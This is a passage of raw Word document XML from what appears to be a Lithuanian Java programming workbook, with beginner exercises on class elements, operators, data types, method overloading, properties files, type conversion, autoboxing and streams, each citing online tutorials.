        <w:r w:rsidRPr="00315788">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Classpath_(Java).</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00315788">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Lesson: The Platform Environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r w:rsidRPr="00315788">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/tutorial/essential/environment/paths.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00315788">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9 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAV</w:t>
      </w:r>
      <w:r w:rsidR="009111D9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>A KLASĘ VARDU JAVAELEMENTS.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00315788">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Element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final String NAME = "JAVA ELEMENTS";</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>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elementsDescri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int counter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elementName = "Hello Worl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printA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OD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lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:history="1">
        <w:r w:rsidRPr="00315788">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/tutorial/java/javaOO/classes.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00315788">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10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PAPILDYKITE JAVAELE</w:t>
      </w:r>
      <w:r w:rsidR="009111D9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>MENTS PROGRAMĄ KODO KOMENTARAIS</w:t>
      </w:r>
      <w:r w:rsidR="00315788">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This class is for describing class elemen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1. Local consta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2. Object variabl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3. Static class variabl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4. Local method variabl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Element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Local consta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final String NAME = "JAVA ELEMEN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Object vari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elementsDescri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 Static class vari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int counter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Local method vari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elementName = "Hello Worl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Prints an array of characters.  The characters are converted into byt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according to the platform's default character encod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since 1.8</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xml:space="preserve">* @param charArray The array of chars to be printe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printAll(char [] charArra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TOD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lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaAtPoint (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Java Comments</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidRPr="0002275B">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.javatpoint.com/java-comments.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0002275B">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00972320">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU JAVAEXPR</w:t>
      </w:r>
      <w:r w:rsidR="00AA1453" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ESSIONSSTATEMENTSVARIABLES.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="006B543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ExpressionsStatementsVariable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Variables names: anByte and anI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byte anByte = 56;</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anInt = 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Expressions: name = "Dave" and age =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name = "Da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age =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atemen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result = age + anI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name + ": " + resul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i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Expressions, Statements, and Blocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:history="1">
        <w:r w:rsidRPr="00972320">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/tutorial/java/nutsandbolts/expressions.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00972320">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r w:rsidRPr="00972320">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/tutorial/java/nutsandbolts/variables.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00972320">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lastRenderedPageBreak/>
        <w:t>12 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA</w:t>
      </w:r>
      <w:r w:rsidR="001769CE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> KLASĘ VARDU JAVAOPERATORS.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="0024763E">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Operator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itialise two variabl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numberOne =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numberTwo = 5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addResult =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minusResult =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multiplicationResult =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divisionResult =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crementResult = ++number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perator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decrementResult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lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Summary of Operators</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:history="1">
        <w:r w:rsidRPr="00E90E39">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/tutorial/java/nutsandbolts/opsummary.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E90E39">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13 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VAR</w:t>
      </w:r>
      <w:r w:rsidR="001769CE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DU JAVAPRIMITIVESDATATYPES.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00E90E39">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PrimitivesDataType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mitives data typ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byte primitiveByt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short primitiveSho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int primitiveI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long primitiveLo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float primitiveFlo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double primitiveDou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char primitiveCh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atic boolean primitiveBoolea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ata types default siz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Byt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Sho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 System.out.println(primitiveI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Lo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Flo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Dou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System.out.println(primitiveCh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Boolea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ata types rang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Byte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yte.MIN_VALUE + ", " + Byte.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Short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hort.MIN_VALUE + ", " + Short.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Int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nteger.MIN_VALUE + ", " + Integer.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Long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Long.MIN_VALUE + ", " + Long.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Float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loat.MIN_VALUE + ", " + Float.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Double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ouble.MIN_VALUE + ", " + Double.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Char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haracter.MIN_VALUE + ", " + Character.MAX_VALU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ystem.out.println("Boolean value &lt;Min, Max&gt;: &l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oolean.TRUE + ", " + Boolean.FALSE + "&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4 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU : JAVANONPRIMITIVESDATATYPES.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00E90E39">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NonPrimitivesDataType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type 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tring text = "Java is a popular programming language, created in 1995. \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t is owned by Oracle, and more than 3 billion devices run Jav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te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type object referen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String textObjectReference = text.getClass().getSimpleName() +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Integer.toHexString(System.identityHashCode(te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tring object reference: " + textObjectReferen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rray type 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 intArray = {10, 45, 89, 65, 78, 23};</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rray type object referen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Array object reference: " + intArra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szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>15 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU JAVAMETHODS.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00E90E39">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public class JavaMethod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lastRenderedPageBreak/>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numberOne =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numberTwo = 5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resultOne = addResult(numberOne,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resultTwo = substractResult(numberOne,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resultThree = multiplyResult(numberOne,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int resultFour = divideResult(numberOne,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System.out.println("numberOne + numberTwo: " + result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System.out.println("numberOne - numberTwo: " + result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System.out.println("numberOne * numberTwo: " + resultThre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System.out.println("numberOne / numberTwo: " + resultFou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public static int addResult(int numberOne, int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public static int substractResult(int numberOne, int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public static int multiplyResult(int numberOne, int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public static int divideResult(int numberOne, int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r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>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shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>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shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>16 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU JAVAMETHODSOVERLOAD.JA</w:t>
      </w:r>
      <w:r w:rsidR="001834DF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VA</w:t>
      </w:r>
      <w:r w:rsidR="00E90E39">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bas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MethodsOverloa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ountArea(12, 1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ountArea(1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ountArea(20, 10, 1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countArea(double sideOne, double side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result = sideOne * side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f("Square/rectangle area is: %.2f%n", resul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countArea(double radiu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result = Math.PI * (radius * radiu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f("Circle area is: %.2f%n", resul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countArea(double baseOne, double baseTwo, double heigh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result = ((baseOne + baseTwo) / 2) * heigh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f("Trapezoid area is: %.2f%n", resul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E90E39" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="142" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="308" w:name="_Toc632763743"/>
      <w:bookmarkStart w:id="309" w:name="_Toc10444010"/>
      <w:bookmarkStart w:id="310" w:name="_Toc13095558"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.2.</w:t>
      </w:r>
      <w:r w:rsidR="009415C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="311" w:name="_Toc13833452"/>
      <w:bookmarkStart w:id="312" w:name="_Toc14392513"/>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Kurti nesudėtingą program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>inį kodą</w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="308"/>
      <w:bookmarkEnd w:id="309"/>
      <w:bookmarkEnd w:id="310"/>
      <w:bookmarkEnd w:id="311"/>
      <w:bookmarkEnd w:id="312"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ</w:t>
      </w:r>
      <w:r w:rsidR="00C93126" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> VARDU JAVAPROPERTIESWRITE.JAV</w:t>
      </w:r>
      <w:r w:rsidR="00752F0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Out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Out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PropertiesWrit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roperties prop = new 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utputStream output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output = new FileOutputStream("config.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Set the properties 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p.setProperty("database", "localho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p.setProperty("dbuser", "jav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p.setProperty("dbpassword", "java_passwor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Save properties to project root fol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p.store(output,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IOException io)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o.printStackTra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finall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f (output != nul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output.clo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catch (IOException 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e.printStackTra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2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLAS</w:t>
      </w:r>
      <w:r w:rsidR="00C93126" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ę VARDU JAVAPROPERTIESREAD.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00752F0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In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n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PropertiesRea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roperties prop = new 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putStream input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nput = new FileInputStream("config.propertie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Load a properties fi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p.load(inpu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Set the property value and print it ou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Database address: " + prop.getProperty("databa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Database user name: " + prop.getProperty("dbus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Database user password: " + prop.getProperty("dbpasswor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IOException e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ex.printStackTra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finall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f (input != nul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  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">      input.clo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 catch (IOException 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e.printStackTra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3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA K</w:t>
      </w:r>
      <w:r w:rsidR="000D6107" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LASĘ VARDU JAVADATACONVERT.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00752F0E">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DataConver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idenning java data conve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byte byteValue =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Byte number: " + byte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Byte to short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rt shortValue = byte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Byte to short conversion: " + shor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rt to int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tValue = shor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hort to int conversion: " + in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to Long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ng longValue = in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Int to Long conversion: " + long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ar charValue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Char: " + char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ar to int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tFromChar = char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System.out.println("Char to int conversion: " + intFromCh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ar to long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ng longFromChar = char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Char to long conversion: " + longFromCh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Variable = 10.45f;</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ng to float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loat floatFromLong = long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Long to float conversion: " + floatFromLo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to double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FromInt = in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Int to double conversion: " + doubleFromI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loat to double conver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FromFloat = doubleVari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Float to double conversion: " + doubleFromFlo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Narrowing java data conve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Number = 100.7;</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ng longNumber = (long) doubl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tNumber = (int) doubl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ouble number: " + doubl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ouble to long conversion: " + long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ouble to int conversion: " + int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eckInstance(doubl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eckInstance(int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checkInstance(Number numb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number instanceof Doubl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umber is a Dou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if(number instanceof Integ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umber is an Integ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number instanceof Comparabl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umber is compar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i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">MRBool (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Java Data Type Conversion</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId136" w:history="1">
        <w:r w:rsidRPr="00752F0E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://mrbool.com/java-data-type-conversion/29257.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00752F0E">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SUKURKITE JAVA KLASĘ VA</w:t>
      </w:r>
      <w:r w:rsidR="000D6107" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>RDU JAVAAUTOBOXINGUNBOXING.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00752F0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AutoboxingUnboxing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utobox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tPrimitiveNumber = 36;</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Integer intToObject = intPrimitiv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 int number: " + intPrimitiv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Boxed primitive int number: " + intTo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eckInstance(intTo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PrimitiveNumber = 12.48;</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doubleToObject = doublePrimitiv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Primitive double number: " + doublePrimitive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Boxed primitive double number: " + doubleTo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heckInstance(doubleToObje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Unbox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eger integerNumber = new Integer(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number = integer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Uboxed Integer number: " + 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checkInstance(Number numb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number instanceof Doubl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umber is a Dou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if(number instanceof Integ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umber is an Integ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i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Autoboxing and Unboxing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId137" w:history="1">
        <w:r w:rsidRPr="00752F0E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/javase/tutorial/java/data/autoboxing.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00752F0E">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xml:space="preserve">. SUKURKITE JAVA KLASĘ VARDU JAVASTREAMS.JAVA. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00752F0E" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javasimple</w:t>
      </w:r>
      <w:r>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Scann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Stream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List&lt;String&gt; fruits = new ArrayLis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canner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ruitFilt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void scannerRead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canner scanner = new Scanner(System.i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4; i++)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Input " + (i + 1) + " frui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tring line = scanner.ne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ruits.add(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void fruitFilt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Filtered fruits li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ruits.stream().filter(s -&gt; s.contains("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map(String::toLowerCase).sort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orEach(System.out::printl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6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JA</w:t>
      </w:r>
      <w:r w:rsidR="00CB3989" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VA KLASĘ VARDU JAVABUFFERS.JAVA</w:t>
      </w:r>
